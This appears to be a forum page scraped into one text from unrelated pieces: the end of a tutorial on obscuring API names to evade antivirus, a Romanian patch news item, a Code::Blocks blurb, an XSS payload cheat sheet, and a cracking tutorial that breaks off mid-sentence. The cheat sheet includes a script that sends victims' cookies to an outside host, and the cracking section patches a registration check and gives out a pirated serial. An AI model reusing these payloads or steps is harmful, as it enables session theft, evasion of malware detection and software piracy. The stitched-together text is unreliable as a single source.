| USER32.MessageBoxA ------------------------- (The addresses may vary) You can see that 2 functions implemented (or otherwise: gecalled) are. Once our sleep, and once our MessageBox. That would be an antivirus program can recognize. For our encryption but you can not see! Since our program is' yes' to the start time (or before) does not know that he is equal to a function name and the corresponding decrypt function is! So, now it compiles times MessageBoxA our example and invites it in Olly. Your back is "Search for -> All inter-modular calls and lands back in the same window. Take a look back at the red line around, and it recognizes your API calls! LoadLibraryA, GetProcAddress, and system and a few others:) But hm, where is our MessageBoxA? Den gibts nicht! Since our program is at this time does not know! We go back to the CPU window (click on the "C" in the menu) and make a quick Clicking in the box below left, then right click and select "Search for -> binary string". First, we select "Entire block" and then jump in the ASCII range and type ... ------------------------- NfttbhfCpyB ------------------------- ... one. This is our Encrypted "MessageBoxA" if you should forget it. Olly And there was! You see, it was not detected a function call. Let's go a little further, it also means "insight". Thus we have a breakpoint on the string. Mark it, make a right click, go to "Point Break" and you see a small menu. We want to be a hardware breakpoint, but on "Access" or "Write"? If we make one in Access, then we would probably break if the string deciphered, and it is called (ie for GetProcAddress is used). Or we take "Write" and then immediately break when we start the string to decrypt. We take the latter;) And be a DWORD (for safety's sake). Once F9 and off you go! We break to: ------------------------- 0040131A A1 00304000 MOV EAX, DWORD PTR DS: [403000] 0040131F 8945 E8 MOV DWORD PTR SS: [EBP-18], EAX; <- HERE ------------------------- Hm, but what's in EAX? I can tell you! "7474664E" equivalent "ttfN" ie "Nftt" which means that the first 4 bytes from Crypteten string copied:) Now they are in EBP-18 is stored. That will be the "cache" or halt the "Endspeicher", where the decrypted "MessageBoxA" is stored. The whole Procedure with the copy line: ------------------------- 0040131A A1 00304000 MOV EAX, DWORD PTR DS: [403000] 0040131F 8945 E8 MOV DWORD PTR SS: [EBP-18], EAX; <- First copy 4 bytes 00401322 A1 04304000 MOV EAX, DWORD PTR DS: [403004] 00401327 8945 EC MOV DWORD PTR SS: [EBP-14], EAX; <- Next 4 bytes to copy 0040132A A1 08304000 MOV EAX, DWORD PTR DS: [403008] 0040132F 8945 F0 MOV DWORD PTR SS: [EBP-10], EAX; <- Next 4 bytes ... 00401332 8D45 E8 LEA EAX, DWORD PTR SS: [EBP-18] <- EAX is now in the address to string 00401335 890424 MOV DWORD PTR SS: [ESP], EAX; <- This is stored in ESP ------------------------- I wonder why the degree of the compiler has done so cumbersome, but maybe. Shortly hereafter follows a call! ------------------------- 00401338 E8 EB000000 CALL 00401428; <- Decrypt ------------------------- As my comment has already promised, here is decrypted! So once we trace pure, so that our F7 key also something to do:) ------------------------- 00401435 8B45 08 / -> MOV EAX, DWORD PTR SS: [EBP +8]; <- In the string load EAX 00401438 890424 | MOV DWORD PTR SS: [ESP], EAX; <- In ESP secure 0040143B E8 F0050000 | CALL <JMP.&msvcrt.strlen>; <- investigating the length of the string 00401440 3945 FC | CMP DWORD PTR SS: [EBP-4], EAX; <- All characters by? 00401443 73 2C | JNB SHORT 00401471; <- Then times jumping out of the loop! 00401445 8B45 08 | MOV EAX, DWORD PTR SS: [EBP +8]; <- The addresses to the string in EAX 00401448 0345 FC | ADD EAX, DWORD PTR SS: [EBP-4] <- The current character ... 0040144B 0FBE00 | MOVSX EAX, BYTE PTR DS: [EAX] <- EAX copy in ... 0040144E 8945 F4 | MOV DWORD PTR SS: [EBP-C], EAX; <- In EBP-C store 00401451 8D45 F4 | LEA EAX, DWORD PTR SS: [EBP-C] <- EAX In the address at the current character 00401454 FF08 | DEC DWORD PTR DS: [EAX] <- HERE! EAX decrease by one 00401456 8B45 F4 | MOV EAX, DWORD PTR SS: [EBP-C] <- EAX in the decoded symbol FB 00401459 8845 | MOV BYTE PTR SS: [EBP-5], AL; <- EBP-5 In the latest sign store 0040145C 8B45 08 | MOV EAX, DWORD PTR SS: [EBP +8] <- EAX has the address again to normal string 0040145F 8B55 FC | MOV EDX, DWORD PTR SS: [EBP-4] <- EDX is 0 00401462 01C2 | ADD EDX, EAX; <- EAX add EDX On 00401464 0FB645 FB | MOVZX EAX, BYTE PTR SS: [EBP-5] <- EAX is back in the decoded symbol 00401468 8802 | MOV BYTE PTR DS: [EDX], AL; <- Decrypts characters in the string will be changed 0040146A 8D45 FC | LEA EAX, DWORD PTR SS: [EBP-4]; <- Will increased (=> next character) 0040146D FF00 | INC DWORD PTR DS: [EAX] <- and hingeschrieben 0040146F EB ^ C4 \ - JMP SHORT 00401435; <- back to the beginning of loop ------------------------- Oh man! So much to read and understand! The comments should enhance the adventure, however;) In brief: All characters by one humiliate! Even shorter: Decrypt! But it is always nice to see what the compiler of our beautiful C code does not it? =) So, now we are setting a breakpoint after the JMP, allow the program to break, and now have our unencrypted "MessageBoxA" in memory lying ===) You do not believe me? Power for a short GOTO 0022FF60, owned, and the sight of you! : P Next in the code. So that our F8 key not schimmelt tippseln we bit on it since, so we also come with back out from the CALL. And we see what is exciting! Traced as little down time, after the Line with "% s", we see a "user32.dll", which looks very nice! And then there is a CALL to LoadLibraryA, and a little bit below make a GetProcAddress. Uhh have you also this tingling in the abdomen when everything is running perfectly? We turn times a breakpoint at the call to GetProcAddress because I have what you want to show! If Olly breaked look her in the stack. ------------------------- 0022FF20 7E360000 | 7E360000 = hModule (user32) 0022FF24 0022FF60 \ ProcNameOrOrdinal = "MessageBoxA" ------------------------- Just so much information at once! : O We recognize this HMODULE our of our code (as hex value in its natural form), and at the same time we recognize that we in the user32 and after "MessageBoxA". We step through this short time and then see CALL EAX into a miracle, our MessageBox was loaded! For me it is "7E3A058A," and when I look in the user32.dll would => It would agree;) You can convince yourself, right click the CPU window, "View -> Modules' user32 '' and now Right click "Goto -> Expression", the address, and schwupps, but it looks very much like a clean function, huh? OK, I think we have enough to getraced code, we have probably learned more (or not) as the Tutorial should provide. I hope part of you has fallen, if you've read through it ^ ^ _________________________ \ / \ / \ / \ / \ / 0x6 \ / \ / \ / \ / \ / \ / ######################### # Degree / Links # ######################### Pffft, then again from me:) The paper is unfortunately not as long as I have, I had hoped: / But I hope at least one which has learned from this tutorial:) This paper is released under the GNU Free Documentation License has been published So it is allowed to modify and distribute as you like, as long as my name on it still stands. Oh you know what, you can even get my name clear because the main people learn xD from this paper, so gehts doch;) So, as a sort of "annex" I have my whole source code here reinkopiert, have fun order, and to read again:) cryptme.c ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( char hello [] = "Hello World"; crypt (& hello); printf ( "% s \ n", hello); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) ------------------------- mymessagebox.c ------------------------- # include <stdio.h> # include <windows.h> int main (int argc, char * argv []) ( func_crypted char [] = "NfttbhfCpyB"; HMODULE dll; FARPROC MyMessageBox; decrypt (& func_crypted); dll = LoadLibrary ( "user32.dll"); MyMessageBox = GetProcAddress (dll, func_crypted); MyMessageBox (0, "In working dude;)", "yeaaah", MB_OK); system ( "PAUSE"); return 0; ) int crypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord + 1; chr = (char) ord; str [length] = chr; ) return 0; ) int decrypt (char * str) ( int length; char chr; int ord; for (length = 0; length <strlen (str); length + +) ( ord = (int) str [length]; ord = ord - 1; chr = (char) ord; str [length] = chr; ) return 0; ) -------------------------

Microsoft planuieste sa lanseze maine trei patch-uri de Alex Hanea | 9 martie 2009 Compania a anuntat inca de vineri ca pe 10 martie va pune la dispozitie trei actualizari de securitate, printre care una considerata critica, pentru Windows 2000, Server 2003, XP, Server 2008 si Windows Vista. Unul dintre patch-uri este catalogat de catre Microsoft ca fiind unul de nivel patru de alerta, mai exact “critic”. Daca este exploatata aceasta problema “critica”, poate permite atacatorilor sa preia controlul computerelor faca ca utilizatorii sa poata misca un deget. Celelalte doua patch-uri sunt clasificate ca fiind "importante", adica nivelul trei de risc, acestea remediind brese folosite de atacatori pentru a pacalii utilizatorii sa divulge informatii confidentiale. Desi compania nu a dezvaluit detalii despre vulnerabilitatile acoperite de patch-urile ce vor fi lansate maine, Microsoft a recunoscut totusi ca aceaste probleme "critice" reprezinta un risc pentru toate versiunile de Windows lansate pana acum, in timp ce unul dintre patch-urile considerate ca fiind “importante” nu afecteaza sistemele de operare XP sau Vista. Update-ul vine la mai putin de o saptamana dupa ce Microsoft a facut referire la un patch pentru o vulnerabilitate "critica", asemanatoare celei rezolvate in patch-ul de maine, dar de data aceasta in Excel. Office sau alte produse Microsoft nu vor fi “afectate” de aceasta operatiune declansata de compania americana.

Foarte vechi, dar merge pe multe servere

Code::Blocks - The IDE with all the features you need, having a consistent look, feel and operation across platforms. The open source, cross platform, free C++ IDE. Code::Blocks is a free C++ IDE built to meet the most demanding needs of its users. It is designed to be very extensible and fully configurable. Finally, an IDE with all the features you need, having a consistent look, feel and operation across platforms. Built around a plugin framework, Code::Blocks can be extended with plugins. Any kind of functionality can be added by installing/coding a plugin. For instance, compiling and debugging functionality is already provided by plugins! We hope you enjoy using Code::Blocks! Highlights: Open Source! GPLv3, no hidden costs. Cross-platform. Runs on Linux, Mac, Windows (uses wxWidgets). Written in C++. No interpreted languages or proprietary libs needed. Extensible through plugins Compiler: Multiple compiler support: GCC (MingW / GNU GCC) MSVC++ Digital Mars Borland C++ 5.5 Open Watcom ...and more Very fast custom build system (no makefiles needed) Support for parallel builds (utilizing your CPU's extra cores) Multi-target projects Workspaces to combine multiple projects Inter-project dependencies inside workspace Imports MSVC projects and workspaces (NOTE: assembly code not supported yet) Imports Dev-C++ projects Debugger: Interfaces GNU GDB Also supports MS CDB (not fully featured) Full breakpoints support: Code breakpoints Data breakpoints (read, write and read/write) Breakpoint conditions (break only when an expression is true) Breakpoint ignore counts (break only after certain number of hits) Display local function symbols and arguments User-defined watches (support for watching user-defined types through scripting) Call stack Disassembly Custom memory dump Switch between threads View CPU registers Interface: Syntax highlighting, customizable and extensible Code folding for C++ and XML files. Tabbed interface Code completion Class Browser Smart indent One-key swap between .h and .c/.cpp files Open files list for quick switching between files (optional) External customizable "Tools" To-do list management with different users Download: codeblocks-8.02-setup.exe codeblocks-8.02mingw-setup.exe NOTE: The codeblocks-8.02mingw-setup.exe file includes the GCC compiler and GDB debugger from MinGW. Linux 32-bit: Ubuntu: http://prdownload.berlios.de/codeblocks/codeblocks_8.02-0ubuntu1.deb.tar.gz Debian: http://prdownload.berlios.de/codeblocks/codeblocks-8.02debian-i386.tar.gz Mac OS X: http://prdownload.berlios.de/codeblocks/codeblocks-8.02-mac.zip

Monedele erau de 5 bani sau de 50 de bani? Si cat de mari erau suruburile? Mai degraba ?aibe. Si e posibil ca un surub sau o ?aiba sa fie mai scumpa de 50 de bani. Interesant.

Sunt curios cati ar vinde lucruri ale lor, macar furate de ei. Cred ca ar fi 90% leeching. Eu nu sunt de acord cu frauda. Vindeti ceva furat, de obicei pe altceva furat... Interesant.

Lipseste un <input type="hidden" name="security-token" value="plm" />

Cine mai invie topicuri din Paleozoic ( adica vechi ) are warn.

Cross Site Scripting exsistance is because of the lack of filtering engines to user inputs at websites on forms. Hackers Evil Link [example 1] <a href="[http://<XSS-host]/xssfile?evil request">Free Laptop!</a> [example 2] <iframe src="[http://<XSS-host]/xssfile?evil request">Free Laptop!</iframe> [example 3] <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://www.Site.com/xss.js"></SCRIPT> XSS Cookie theft Javascript http://host/a.php?variable="><script>document.location='http://www.mysite.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> Moding Cookies [example 1] <script>javascript:void(document.cookie="username=Admin")</script> How to Search for Vul Hosts [example 1] [host]/<script>alert("XSS")</script> [example 2] [host]/<script>alert('XSS')</script>/ [example 3] [host]/<script>alert('XSS')</script>. [example 4] [host]/<script>alert('XSS')</script> [example 5] [host]/\<script\>alert(\'XSS\')\<\/script\> [example 6] [host]/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl [example 7] [host]/\<sCRIPT>alert("d")</sCRIPT>\ [example 8] [host]/<\73CRIP\T>alert("dsf")<\/\73CRIP\T> [example 9] [host]/<\73CRIP\T>alert('dsf')<\/\73CRIP\T> [example 10] [host]/</sCRIP/T>alert("dsf")<///sCRIP/T> [example 11] [host]/</sCRIP/T>alert('dsf')<///sCRIP/T> [example 1] <script>javascript:alert(documentt.cookie)</script> [example 2] <script>javascript:alert("XSS")</script> [example 3] "<script>alert()</script>"This Site is not Secure! - Also use "?" post request after the host. [example 1] [host]/?<script>alert('XSS')</script> WebServers XSS Many webservers have default pages to folders that will look for a file. [example 1] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas [example 2] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp [example 3] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp [example 4] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm [example 5] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html [example 6] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext] A common place for an XSS hole is inside a server default example files, such as: [example 1] [host]/cgi/example?test=<script>alert('xss')</script> Most common places to find XSS in are the search files of servers. [example 1] [host]/search.php?searchstring=<script>alert('XSS')</script> [example 2] [host]/search.php?searchstring="><script>alert('XSS')</script> [example 3] [host]/search.php?searchstring='><script>alert('XSS')</script> Social Engineering XSS Using the characters instead may fool the filters and allow XSS to work. [example 1] [host]/%3cscript%3ealert('XSS')%3c/script%3e [example 2] [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e [example 3] [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e [example 4] [host]/%3cscript%3ealert('XSS')%3c/script%3e [example 5] [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e [example 6] [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e [example 7] [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e [example 8] [host]/%3cscript%3ealert("XSS")%3c/script%3e [example 9] [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e [example 10] [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e [example 11] [host]/%3cscript%3ealert("XSS")%3c/script%3e [example 12] [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e [example 13] [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e [example 14] [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e - Also use "?" post request after the host. [example 1] [host]/?%3cscript%3ealert('XSS')%3c/script%3e 100% encoded [example 1] [host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d %65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e [example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e %74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e [example 3] [host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63% 6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e Another form of encoding is: <script>alert(document.cookie)</script> < is encoded as: < > is encoded as: > [example 1] %3Cscript%3Ealert(%22XSS%22)%3C/script%3E [example 2] <script>alert("XSS")</script> [example 3] <script>alert("XSS")</script> [example 4] <script>alert(%34XSS%34)</script> [example 5] <script>alert('XSS')</script> [example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E Any of the XSS requests presented above could be used on any asp, cfm, jsp, cgi, php or any other active html file. [example 1] [host]/forum/post.asp?<script>alert('XSS')</script> [example 2] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e [example 3] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e [example 4] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e [example 5] [host]/forum/post.asp?<script>alert("XSS")</script> Finding errors such as inputting a string instead of a number or "\" or "/" instead of a string, or a very long string & a very large number. All this malformed parameters can help us find the place to inject XSS script. Tag Closer The "Tag Closer" method is used by inputing non-alphabetic and non-numeric chars inside form's input text boxes. This chars could be: \,/,~,!,#,$,%,^,&,-,[,],null(char 255),.(dot) But the chars that mostly does the job is either " or '. What we do is just insert "> or '> inside a text box instead of our name/email/username/password and etc... [example 1] [host]/admin/login.asp?username="><script>alert('XSS')</script>&password=1234 [example 2] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script> [example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"> < /textarea>--><script>alert('XSS')</script> [example 4] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script> [example 1] [host]/admin/login.asp?username='><script>alert('XSS')</script>&password=1234 [example 2] [host]/admin/login.asp?username=admin&password='><script>alert('XSS')</script> [example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'></textarea>--> < script>alert('XSS')</script> [example 4] [host]/search.php?action=soundex&firstname='><script>alert(document.cookie)</script> This mainly works on the servers root: [example 1] [host]/?"><script>alert('XSS')</script> [example 2] [host]/?'><script>alert('XSS')</script> [example 3] [host]/?--><script>alert('XSS')</script> About <plaintext> Another trick for exploiting an XSS was found by putting a <plaintext> tag after the xss code. Sometimes that makes it easie to exploit. [example 1] [host]/?"><script>alert('XSS')</script><plaintext> [example 2] [host]/?'><script>alert('XSS')</script><plaintext> [example 3] [host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234 [example 4] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext> [example 5] [host]/forum/post.asp?<script>alert('XSS')</script><plaintext> [example 6] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext> [example 7] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext> [example 8] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext> [example 9] [host]/forum/post.asp?<script>alert("XSS")</script><plaintext> [example 10] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script><plaintext> [example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cplaintext%3E[/code{ ] } Simple Codes just incase some of them do-not seem to work: < /title><script>alert("XSS");</script><title><plaintext> < script>alert(document.cookie)</script><plaintext> Security Conclusion [Replace] < with < > with > & with & " with &quote; [Possible XSS] <applet> <frameset> <layer> <body> < html> <ilayer> <embed> <iframe> < meta> <frame> <img> <object> < script> <style>

I have been cracking sixth months ago and everything is good till now so I managed to share my knowledge with you. Note: if some links didn't work try googling the tool or the program, sorry for the inconvenience. The first thing I think you should do is get "W32Dasm". This is one of the tools you will use regularly when cracking. It is a "disassembler". It disassembles files, so you can see how the program is set out, how it works etc. Get this tool from :- http://www.woodmann.com/crackz/Tools.htm Just copy and paste that URL into your browser and you should start downloading. Go get this program now, and resume the tutorial when it's installed. When you disassemble a file for the first time, you'll look at the contents of your screen and think, "Oh dear...". Don't be discouraged, what you'll be looking at is the program's "Assembly". You will have to get to know what lots of the stuff means. I'm still struggling, but I'm still learning. The assembly of a program is the listing of all the functions it carries out. Every program you disassemble will look similar. When you disassemble a program using W32Dasm you will notice it takes a long time to load some files, depending on the size of the exe you are disassembling. (Especially on my slow excuse for a PC!) Load "calc.exe" (The Windows Calculator) into the disassembler. The one I have is 92KB, but if yours is different, just apply what I say to your version. (P.S. If you skipped ahead without getting W32Dasm, get it now, you honestly will need it from this point on). Disassembled the calculator? Good. Now, a few basics about the disassembled text. First of all, click on the button on the W32Dasm toolbar that says "Cd Loc". (When you put your mouse over this button it will say "Goto Code Location". Push the button. A window will pop up). Type in the window :- "010026A6" (Without Quotes) (Don't worry, it's only a random number I have chosen). Click on OK. All the way down the left side of the page you will see 8 numbers (or letters). These first 8 numbers or letters on each line are the "Addresses" or "Code Locations". Ignore the numbers and letters after the addresses for now. Addresses are used so that if a program says "Carry out the function at address (Whatever the address is)", the program will know where to go next. Things like that. Look at the right hand side of the assembly language. You will see something like the following: (Don't worry if yours isn't the same as what is written here - it's not important). call 01007387 mov ecx, dword ptr [01013D90] mov dword ptr [ecx+04], eax mov eax, dword ptr [01013D64] mov eax, dword ptr [4*eax+01013CE0] jmp 01002745 These are the actual instructions. Don't ask me what it all means! I only know the basics right now. Look for an instruction that begins with a "Jmp". Any one you can find. If you're using the same file as me, there will be one just below where your blue bar should be :- :010026AD E993000000 jmp 01002745 ^ ^ ^ Address "Hex" Instruction Don't worry yourself with hex just yet. See the "Jmp" is followed by an address. Here is a good place to explain that "Jmp" means "Jump". This means that the program will jump from the address specified on the left (e.g. in the above example the address is 010026AD) to the address specified in the Jump instruction (e.g. 01002745). Double-Click on the line with the "Jmp". The blue bar should go onto the line and turn green. Memorize the address after the "Jmp" (E.g. in the above example I mean memorize "01002745"). Look at the toolbar of W32Dasm. You will see a "Jump to" button. Put your mouse over it. It will say, "Execute Jump". Click on the button. Look at where it has taken you. Look on the left, the address is the one specified in the Jump instruction. Go to any random parts in the file and try this jumping procedure some more, so you get used to how jumping and addresses work. Now I'll explain about different jumps. The "Jmp" was an "Unconditional Jump". This means that the program will jump when it reaches the "Jmp" instruction, no questions asked. There are many other types of jump. Here are some of the most important: "Je" - Jump if Equal This will regularly come after a "Cmp" (Compare) instruction. You will see the compare instruction as "Cmp" followed by two values. e.g. Scroll up to address "010025C2" if you are using the same version of calc as me, otherwise, just follow what I'm saying. You'll find loads of "Cmp" instructions in your file also. :010025C2 3BC3 cmp eax, ebx :010025C4 0F84DD020000 je 010028A7 This is a typical example of a "Cmp" instruction followed by a "Je". In this example, when the program gets to this point, it will compare the value contained in ebx with the value contained in eax. (EAX and EBX are "Registers". Don't worry about it quite yet!) If the values in these registers are equal, the program will jump when it reaches the next (Je) instruction. If EAX and EBX's value are not equal, the program will not jump, the instruction will be ignored. "Jne" - Jump if NOT Equal This is the same sort of thing as "Je", but it's the opposite. It jumps if the compared values are not equal. It would be common to find a "Jne" in a relevant part of code in a program you are cracking, where if the program compares the registration code you entered with the right code, and they don't match, it will jump to a set of instructions that send you the error message. "Jz" - Jump if Zero This is like "Je" but it is after the program calculates something. If the answer to the calculation is 0 (Zero), the jump will occur. "Jnz" means Jump if NOT Equal. (Use your common sense). I will explain more about these jumps when I try to explain "SoftICE" to you. There are other jumps, but they don't need explaining now. Without any further ado, let's do some practical work... You will need two programs :- "Hex Workshop" (Version 2.20) (Which we will be cracking) and "Hackers' View" (or "HIEW" for short. This is a tool you will need to start using). Get these programs. http://ftp.bspu.unibel.by/fileecho/MFEDOS/HIEW616.ZIP (Hackers' View - copy and paste the URL and you should start downloading). http://www.bpsoft.com (Hex Workshop) Some of the links may be dead by the time you get to read this, if that's the case, just find a cracker, they should help you get the tools. (Or you could E-Mail me at "Florestan5@hotmail.com" and I'll send them by mail. Got the programs? Good. All set up? Run Hex Workshop. (HWorks32.exe). Aha, look in the top right hand corner. "Unregistered Version". We don't like that... Go to "Help", and "About". Here you have the chance to enter the serial number. Enter anything and click on "Register". Unless you are the luckiest person on earth and guessed the correct code, you will be staring at an error message. Write the message down. ("You have entered an invalid registration number" will suffice). Get out of the program. Highlight the HWorks32.exe file and copy it. (Ctrl-C, as if you didn't know). Make 2 copies of the file. Rename one "HWorks32.ex_" for backup, if we totally screw the program up when we're cracking it. Rename the other one "HWorks32.w32". This helps you remember that this is the file you will disassemble using (.w32)Dasm. Load up "HWorks32.w32" into W32Dasm. Click on find on the W32Dasm toolbar. Get the message you wrote down. Type in "You have entered an invalid". Click on find. It will put you in the section headed "Dialog Information", before you even come to any instructions or addresses. Look up 2 lines. You will see "DialogID_0075". Write this information down, as this is what the program will refer to when it needs the text for the error message. Click on find again. Enter "DialogID_0075" and click on find. You will land on a line that says "Possible reference to Dialog: DialogID_0075". Look up to where it says :- Referenced by a (U)nconditional or ©onditional jump at address: |:0041BCCE© This means that the address 0041BCCE had a conditional jump (I.E a "Je" or "Jne" etc.) that told the program to go to the part of the code that follows the "Referenced by a (U)nconditional or ©onditional jump at address" text. Eg. When we go to the code location (address) 0041BCEE, we should see one of the following lines: je 0041BD4D ;or jne 0041BD4D ;or jz 0041BD4D (you get the picture). So lets scroll up to address 0041BCCE. It shouldn't be far away. Found the address? Look. Sure enough: :0041BCCE 0F8479000000 je 0041BD4D Write the address down. (Write down "0041BCCE") This instruction "je 0041BD4D" we are about to change, so that is "jne 0041BD4D". DON'T close W32Dasm yet. Minimize it. Run HIEW (Hackers' View). Find your original HWorks32.exe file and open it in HIEW. When this is done, press F4. From here you can select "Decode Mode" which is where we can change what the program does. Select Decode mode. Sure enough, you notice anything familiar? Yep. Good old assembly! Press F5. The top line will change colour and you will be able to put the address we wrote down in here. Put the address you made a note of. IMPORTANT - Make sure you put a dot (.) before the numbers. So type in (Without quotes of course) ".0041BCCE" Press return. You'll be at the line of code we saw in W32Dasm and wanted to change. Press F3. This will allow you to change stuff. Be VERY careful you don't accidentally change things you're not meant to. Press the right arrow key twice so the underscore is under the 8. Type 85. You changed Je (84) to Jne (85). It should be noted Je is not always 84 and Jne 85. It varies depending on how many bytes are in the instruction. "Bytes" consist of two hex characters. So the line we are editing has 6 bytes. (12 Characters). Other times, for example when there is only 2 bytes in the jump instruction, the first byte is the one you will modify, not the second. and in that case, je will be 74, and jne would be 75. But let's not go into that right now. You have changed the second byte in our instruction. That has changed je to jne. press F9 to update the file and get out of editing mode. Press F10 to get out of HIEW. Go and run "HWorks32.exe". This is the file you just changed. Go to Help, and About again. Type in any code. Click "Register". Presto! Registered! Choose a name and company and press OK. Get out of HWorks32.exe and then run it again to make sure it stays cracked. (You'll find a lot of programs you think you'll have cracked this way, but then when you run them after you exit, it'll say it's unregistered again). Yep. This is still regged. Congrats. You've just cracked your first program!!! Now you can close W32Dasm. (We just kept it open in case the byte we changed didn't do anything). The next thing I'm going to do is show you "SoftICE". Go get this superb program. You'll need it if you want to do "proper" cracking, where you find registration codes, without even modifying the program. That's the best, cleanest type of cracking you can do. It's also the type of cracking you'll get to feel you've really achieved something. Get SoftICE. It can be found at: http://soft.ivanovo.ru:8100/Win/SoftICE/si325w98.zip (copy and paste the URL into the browser to start downloading) You'll also need a program called "WinRAR". You can get it from www.download.com if you haven't got it already. Once you start installing it you'll be asked to enter your name and registration info. Register it. It's only £30...I used a code that I got passed on to me by another cracker by way of a tutorial. Usually you shouldn't use other peoples' reg info to reg programs. That's what lamers do who can't crack programs. However cracking SoftICE requires specialist tools, and is I expect, waaaaaaay beyond your (and mine!) capability. SoftICE is a tool you WILL need to crack programs efficiently. Use the following registration number: "1907-0000DD-99". Follow the instructions and install. Let it make changes to your autoexec.bat, as it needs to be loaded as a program before windows starts. When SoftICE is installed, go to the SoftICE directory and open the "winice.dat" file with notepad. Find the line that says "INIT=Code On" or similar. Change that line to the following :- INIT="lines 60;color f a 4f 1f e;wd 22;wc 22;code on;x;" This just tells the program how many lines to allow to each "section" of SoftICE, and it gives it some more interesting colours than the boring ones the installation gives it. Now go down to where it says "Examples of Export symbols" and there will be a list of files starting with ";EXP=". Remove all of the ; symbols from the beginning of those lines. This makes sure that when we restart our computer and go into SoftICE we can set "Breakpoints" on the windows "API" (Which is vital to us!) Save the file and restart your computer....................... Okay, your back. It might be a good idea to print out the next few paragraphs (Until I say "Stop Printing"), because when you're in SoftICE, you can't access any other programs until you leave, and we don't want to be going back and forth between SICE (SoftICE) and Notepad all the time, and when we start cracking, we won't be able to get out of SoftICE of it'll ruin our work, and we'll have to start again. ---------------------------------------START PRINTING HERE--------------------------------------- Press Ctrl+D and you'll see SoftICE in all it's glory. The top section with the first line of text starting with "EAX=" is the section of SoftICE for registers. Registers are places in memory. Memory is where all the information is kept, and registers save the addresses of the places in memory that are important to the program at that time. (That's not the only way they work, but it's all you need to know for now). The line of characters "o d i s z a p c" are all flags. ("o" is a flag, "d" is a flag etc.) The only important one to us right now is the "Zero" flag. That's the "z". You notice, some flags will be highlighted. These are the flags that are active. Remember when we were talking about jumps, and we talked about "jz" (Jump if Zero) and "jnz" (Jump if not Zero). This is what it looks at. These flags are either active or inactive, but they are always there. For example if in SoftICE we came across a piece of code that had a "jz" in it, we could look at the zero flag just before that function was carried out, and we would know it the program would jump or not! Cool eh? While we are talking about code, let's look at the code section of SICE. (The yellow (Well, they should be yellow) lines separate the sections of SICE). This 3rd section is the "Code Window". (I'll talk about the 2nd section in a minute). The code window should look familiar. The difference between the code here, and the code in W32Dasm, is that the code here in SICE is actually being executed, and when you exit SICE, the highlighted (red) line of code will be executed straight away. This is one of the reasons SICE is so powerful. Look at the 2nd section. This is the "Data Window". This is the memory basically. Type in: d edx and press Enter. You should see the Data Window change. What you've just told SICE to do is "Display EDX". SoftICE showed you the memory at EDX. Look at the Registers Window where it says EDX=(whatever). You will notice that the number after EDX is the first number in the Data Window. This is because EDX is storing the address in memory that you have just told SoftICE to display. If you got a message saying "Invalid Address", don't worry, just use my example with EAX or ESI etc. I'm just trying to explain registers. That is how the Data Window works. The last section is just where you type in commands. Now lets do a real crack! Get "5 or More" version 2.0a from :- http://www.midstream.com Got the program, good! Then let's begin, set the program up and run it. You'll see "EVALUATION COPY" at the top of the window. Go to "Help" and click on "Register". We see two boxes to enter the information that is needed to register the program. Go into SICE (Ctrl+D remember). The next thing we do is "Break" into SoftICE when the program reads in what we enter. For the program to get the information we enter into the boxes, it will need to use the windows API functions. We will need to tell SoftICE to come to life when a program uses one of these functions. Most programs will use one of the following functions: "GetWindowText" 